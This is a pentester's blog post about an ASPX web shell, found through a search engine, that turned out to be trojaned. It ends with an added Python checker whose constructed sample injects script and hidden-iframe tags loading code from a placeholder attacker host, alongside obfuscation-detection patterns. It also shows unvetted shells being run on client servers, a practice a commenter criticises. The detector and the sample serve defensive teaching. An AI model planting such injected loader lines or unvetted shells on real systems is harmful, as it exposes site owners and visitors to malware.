Wednesday, November 25, 2009

Trojaned Shell - mystery solved

Once upon a time, I had a client who requested a full black-box attack on his networks. One of the IPs I was given hosted a website running an application in which I found a vulnerability that allowed me to upload files to the remote server.

Long story short, I uploaded an ASPX shell, found simply by googling "aspx shell": the first result was exactly what I needed, and it saved me the time of writing my own.
Google Result. I checked the shell line by line to see that it was okay, and indeed it looked fine. I managed to get inside the website and even got Domain Administrator afterwards.



Great news... so why am I telling you this, you probably ask yourself. Because a few weeks later I had a funny incident. I hacked into another website and used the same shell again; this time I just googled it and didn't validate the code. But when I opened my remote page on the victim's (client's) site, I saw my browser going to different websites that it could not resolve, so I immediately suspected I had browser malware, or some other process injecting code into my browser.

One thing I want to clarify: I don't use anti-virus, simply because I don't believe in it. If you've ever tried, you know it's not hard to bypass anti-virus so it won't recognize your piece of code. I monitor my computer like a lunatic: I check my SSDT for hooks almost every day :). I keep track of which DLLs are loaded in each process, check services, verify autoruns, etc. etc. Like I said, a lunatic :).

That's why it was weird to see in Wireshark the browser going to strange places, including some malicious sites. It was weird since I was on only one page, whose content I knew (since I had uploaded it to the server), and I wasn't doing anything else that required an internet connection.
Immediately I started to debug my Firefox, look for suspicious strings in memory, check every single DLL it had loaded, and check for ARP poisoning in case someone was injecting a FRAME into my traffic. Absolutely NOTHING!

I started to think my Firefox had come trojaned when, in one of the scans with the anti-virus products I used to check whether I had something common, I saw an infected file in the SOURCE CODE of Firefox, which I had downloaded from Mozilla. It was extremely weird. Too bad I had forgotten to turn off automatic deletion (since it was deleted, I couldn't examine it), so at that point I was sure the same virus that attacked me had searched for the code and put malicious code into the Firefox source code as well (and I was actually happy to see such a nice way for malicious code to spread :)), but that's probably a false positive.

(screenshot of BitDefender results).


By the way, that source-code bz2 file from Mozilla: I hadn't actually installed it, but used it to check some sources where I thought there was a little bug. Luckily it's open source, right?

Anyway, I couldn't find anything else on my computer, no more weird traffic in Wireshark, and I had almost decided to format my computer when I realised that it only appeared on that page.

Well... I went to the same page again and viewed the source, and there it was: THE SHELL CODE WAS TROJANED. The malicious sites my browser tried to reach were pages reported as drop sites for malicious software:
Google Safe-Browsing report for omochacha[dot]com

These lines appeared in the trojaned source code:
Quite obvious, right? Indeed. I tried to download those JS files for analysis, but couldn't (404). Given the weird errors I had seen, the JS download from the script had evidently worked at the time, which is why the browser tried to contact a bunch of other sites like the one in the report above.

I tried to work out whether the shell had arrived trojaned or became infected on my computer, and found a cached Google page indicating that I had probably googled it and got the trojaned version the second time I downloaded it. GOOGLE CACHE result for the same shell + some "EXTRA SURPRISES". I will try to see if there's any cache for it and will try to analyze it.

I will be going to the SANS conference in London this Friday, so I won't have lots of time for blogging, but till next time, cheers :)
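The lesson of the post is that a downloaded tool has to be vetted every time, not just the first time: the same search returned a copy with extra script and iframe tags pointing at other hosts. The check below is an added example, not code from the original post or from the shell it describes. It hashes the file against a previously reviewed copy and flags the three things that gave the trojaned copy away: tags that load content from another host, zero-sized iframes, and inline client-side scripts built from eval/unescape-style obfuscation (server-side `runat="server"` blocks are the shell's own code and are skipped). Both sample pages are constructed for the example, the server-side block is a placeholder rather than working shell logic, and attacker.example is a placeholder domain, not an indicator from the post.

```python
import hashlib
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: a minimal ASPX page standing in for the vetted shell.
# The server-side block is a placeholder, not working shell logic.
CLEAN_SHELL = """<%@ Page Language="C#" %>
<script runat="server">
  // server-side handler elided; placeholder for the example only
  void Run(object s, EventArgs e) { outp.Text = "..."; }
</script>
<html><body><form runat="server">
<asp:TextBox id="cmd" runat="server" />
<asp:Button id="go" Text="Run" OnClick="Run" runat="server" />
<pre><asp:Literal id="outp" runat="server" /></pre>
</form></body></html>
"""

# Constructed: the same page with three injected lines of the kind the post
# describes (external script, hidden iframe, obfuscated inline script).
# attacker.example is a placeholder domain, not a real indicator.
INJECTED = (
    '<script src="http://attacker.example/x.js"></script>\n'
    '<iframe src="http://attacker.example/in.php" width="0" height="0"></iframe>\n'
    "<script>eval(unescape('%61%6c%65%72%74%28%31%29'))</script>\n"
)
TROJANED_SHELL = CLEAN_SHELL + INJECTED

# Tags that pull content from another host (absolute or protocol-relative URL).
EXTERNAL_SRC = re.compile(
    r'<(script|iframe|img|object|embed)\b[^>]*\bsrc\s*=\s*["\']?((?:https?:)?//[^"\'\s>]+)',
    re.IGNORECASE)
# iframes with a zero width or height: invisible drive-by loaders.
HIDDEN_FRAME = re.compile(
    r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?:px)?\b', re.IGNORECASE)
SCRIPT_BLOCK = re.compile(r'<script\b([^>]*)>(.*?)</script>', re.IGNORECASE | re.DOTALL)
RUNAT_SERVER = re.compile(r'\brunat\s*=\s*["\']?server\b', re.IGNORECASE)
OBFUSCATION = re.compile(
    r'\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(', re.IGNORECASE)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def external_sources(text: str) -> List[Tuple[str, str]]:
    """(tag, url) for every tag whose src points at another host."""
    return [(m.group(1).lower(), m.group(2)) for m in EXTERNAL_SRC.finditer(text)]


def hidden_frames(text: str) -> List[str]:
    return [m.group(0) for m in HIDDEN_FRAME.finditer(text)]


def obfuscated_client_scripts(text: str) -> List[str]:
    """Inline client-side scripts that use eval/unescape-style obfuscation.
    Blocks marked runat="server" are the shell's own server code and are skipped."""
    hits = []
    for m in SCRIPT_BLOCK.finditer(text):
        attrs, body = m.group(1), m.group(2)
        if RUNAT_SERVER.search(attrs):
            continue
        if OBFUSCATION.search(body):
            hits.append(body.strip())
    return hits


def vet_shell(text: str, known_sha256: Optional[str] = None) -> Dict:
    """Vet a downloaded web page/shell before it goes anywhere near a client host.
    'clean' is True only when the file hashes to the previously reviewed copy
    (if one is given) and carries no external source, hidden frame or
    obfuscated client-side script."""
    digest = sha256_hex(text)
    report = {
        "sha256": digest,
        "matches_known": None if known_sha256 is None else digest == known_sha256,
        "external_sources": external_sources(text),
        "hidden_frames": hidden_frames(text),
        "obfuscated_scripts": obfuscated_client_scripts(text),
    }
    report["clean"] = (report["matches_known"] is not False
                       and not report["external_sources"]
                       and not report["hidden_frames"]
                       and not report["obfuscated_scripts"])
    return report


if __name__ == "__main__":
    known = sha256_hex(CLEAN_SHELL)  # hash recorded after the line-by-line review
    for name, body in (("vetted copy", CLEAN_SHELL), ("re-downloaded copy", TROJANED_SHELL)):
        r = vet_shell(body, known)
        print(f"{name}: clean={r['clean']} matches_known={r['matches_known']}")
        for tag, url in r["external_sources"]:
            print(f"  external {tag} -> {url}")
        for frame in r["hidden_frames"]:
            print(f"  hidden iframe: {frame}")
        for script in r["obfuscated_scripts"]:
            print(f"  obfuscated script: {script}")
```

The hash comparison is the cheap part and would have caught this case on its own; the pattern checks are there for a first download, where there is no reviewed copy yet. They are indicators, not proof: a shell that legitimately loads jQuery from a CDN will trip the external-source check, so each hit still needs a human looking at the line.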

1 comment:

Anonymous said...

Based on the "vhosts" in the path of the first image, I wonder if you may have exceeded your scope of permission in testing that system. While it's certainly possible that your client is an ISP or hosts several virtual hosts of their own in a meticulous sort of file structure, my suspicion is that the physical server may belong to a different company. You state that you were able to obtain Domain Administrator access; was the domain in question that of your client?

From a professional standpoint, I would strongly discourage running non-vetted code on your client's equipment. Explaining why a pen test resulted in an actual information breach to an unknown third party or a loss of data is not a conversation I would like to have.
